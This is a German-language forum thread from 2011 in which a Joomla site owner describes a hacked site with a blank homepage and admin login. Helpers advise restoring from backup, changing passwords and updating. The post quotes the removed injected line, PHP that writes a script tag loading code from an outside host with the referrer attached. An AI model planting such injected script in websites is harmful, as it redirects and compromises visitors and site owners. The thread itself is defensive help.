Startseite + Backend-login von heute auf morgen weg (weiße Seite)

**Schwerkraft** · 12.01.2011 10:56

Hallo,

hat event. wer eine Idee was passiert sein könnte wenn von heute auf morgen auf einmal die Startseite als auch die joomla-login page per "www.domain/administrator" nur noch weiß ist?

Es gab weder Servercrash's noch hat wer der einen FTP zugang hat, etwas verändert darauf.

Das einzige was mir auffiel ist das die index.php zu einem Zeitpunkt geändert/touched wurde wo definitiv keiner darauf zugegriffen hat (Feiertag 8h morgens).

Nachdem ich folgende Zeile am Ende der index.php entfernt hatte, war zumindest die Homepage wieder sichtbar, jedoch bekomme ich immer noch kein login in das Joomla Backend.

Entfernte Zeile:

Code:

<?php echo ''; ?><?php echo '<script type="text/javascript">document.write('<'+'script type="text/javascript" src="http'+(location.href.match(/^https/i)?'s':'')+'://gazgaped778.com/traff.php?ref='+escape(document.referrer)+'">'+'<'+'/script'+'>');</script>'; ?>

Hat hier jemand eine Idee was schief gelaufen ist bzw. was ich machen kann um mich wieder per Backend anmelden zu können?

Betreffende Homepage => http://www.playstore.at

Das ganze läuft bei einem Webhoster mit PHP 5.2 und Joomla in der version 1.5.20

Bin über jede Hilfe dankbar

**magret** · 12.01.2011 11:18

Deine Seite ist gehackt worden.
Das ist ein versteckter JS redirect.
Möglichst schnell entfernen bevor es Dein Hoster entdeckt.
Also alles platt machen FTP und DB und Daten von Sicherung neu einspielen.

Viel Erfolg.
M

**Indigo66** · 12.01.2011 12:12

Und alle Passwörter ändern. Auch die vom FTP.
FAQs 2.6 lesen!

**Schwerkraft** · 12.01.2011 12:44

Danke für die Antwort, habe mittlerweile auch den zweiten versteckten code für das Backend gefunden, keine Ahnung warum ich da nicht schon vorher darauf gekommen bin, Site läuft wieder.

Hab mir jetzt ein paar Videos angesehen wie man eine Joomla-page hacked und es erstaunt mich wie leicht man eine solche page hacken kann, gibt es da möglichkeiten um die Site sicherer zu machen oder per module/plugins die daten zu verschlüsseln?

PS: die passwörter hab ich bereits sicherheitshalber geändert.

**Indigo66** · 12.01.2011 12:48

Joomla und Erweiterungen "immer" auf den neusten Stand halten. Aktuell 1.5.22.
Wenn Dein FTP-Account durch Malware ausspioniert wurde, hilft auch keine aktuelle Version mehr, nur PC sauber halten und wöchendlich PW ändern.

Deine Videos zeigen wahrscheinlich eine ältere Joomlaversion, die Sicherheitslücken hatte. In der aktuellen Version ist keine bekannt.

**Schwerkraft** · 12.01.2011 13:08

Das in der aktuellen keine bekannt sind, beruhigt mich wieder, werde mir gleich die update files runterladen und auf den neuesten Stand bringen.

Danke für die Hilfestellung.

**Indigo66** · 12.01.2011 13:13

Zitat von Schwerkraft

Das in der aktuellen keine bekannt sind, beruhigt mich wieder, werde mir gleich die update files runterladen und auf den neuesten Stand bringen.

Danke für die Hilfestellung.

Und in Zukunft immer brav updaten! Versprochen?
Überprüfe auch Deine Erweiterungen, ob diese aktuell sind, denn auch darüber können Hacker rein, ohne das es am Joomlacore liegt.

**Schwerkraft** · 12.01.2011 13:15

Versprochen

Thema: Startseite + Backend-login von heute auf morgen weg (weiße Seite)

LinkBack

Themen-Optionen

Thema durchsuchen

Anzeige

Startseite + Backend-login von heute auf morgen weg (weiße Seite)

Erhielt Danksagungen von:

Erhielt Danksagungen von:

Lesezeichen

Lesezeichen

Berechtigungen